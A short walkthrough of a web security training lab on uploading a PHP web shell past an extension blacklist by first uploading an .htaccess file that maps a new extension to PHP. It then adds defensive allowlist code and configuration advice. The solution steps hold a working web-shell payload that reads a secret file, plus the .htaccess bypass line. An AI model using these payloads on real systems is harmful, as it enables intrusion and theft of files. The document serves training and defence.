8.4 Lab: Web shell upload via extension blacklist bypass | 2024


Karthikeyan Nagaraj
2 min read · Feb 14, 2024

Description

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

  1. Log in to your account with wiener:peter
  2. Turn on the proxy and upload shell.php, which contains the code below:
    <?php echo file_get_contents('/home/carlos/secret'); ?>
  3. Send the request to Repeater and change the following values:
    filename=".htaccess"
    Content-Type: text/plain
    Remove the payload
    Add this line in place of the payload: AddType application/x-httpd-php .shell
  4. Send the request, undo the changes, and send the same request again with the filename changed to shell.shell
  5. Now go to My Account, refresh the page, right-click the image, and click Open Image in New Tab
  6. Copy the secret code and paste it into the solution box to solve the lab
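
On the defensive side, the steps above work because the upload check is a blacklist and the client-supplied filename is used as-is. The following is an added example, not code from the lab or the original post: it contrasts a blacklist check with an allowlist that inspects content and picks the stored name server-side. The function names, the blacklist contents and the sample uploads are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example; function names and the blacklist contents are assumptions.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

// Blacklist style: anything not explicitly banned is accepted.
function blacklistAllows(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return !in_array($ext, ['php', 'php5', 'phtml'], true);
}

// Allowlist style: returns a server-chosen stored name, or null to reject.
function safeStoredName(string $clientName, string $bytes): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if (!is_string($mime) || !array_key_exists($mime, ALLOWED)) {
        return null; // content is not one of the permitted image types
    }
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($ext === 'jpeg') {
        $ext = 'jpg';
    }
    if ($ext !== ALLOWED[$mime]) {
        return null; // extension missing, unknown, or inconsistent with content
    }
    // The client-supplied name is never used on disk, so ".htaccess" cannot be written.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
}

// Constructed sample uploads: filename => body.
$png = "\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00";
$samples = [
    'avatar.png'  => $png,
    'shell.php'   => "<?php echo file_get_contents('/home/carlos/secret'); ?>",
    '.htaccess'   => "AddType application/x-httpd-php .shell\n",
    'shell.shell' => "<?php echo file_get_contents('/home/carlos/secret'); ?>",
];
foreach ($samples as $name => $body) {
    printf("%-12s blacklist=%-6s allowlist=%s\n", $name,
        blacklistAllows($name) ? 'accept' : 'reject',
        safeStoredName($name, $body) ?? 'reject');
}
```

Serving uploads from a directory where Apache is configured with AllowOverride None, or from outside the document root, removes the other half of the flaw, since an uploaded .htaccess would then have no effect.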
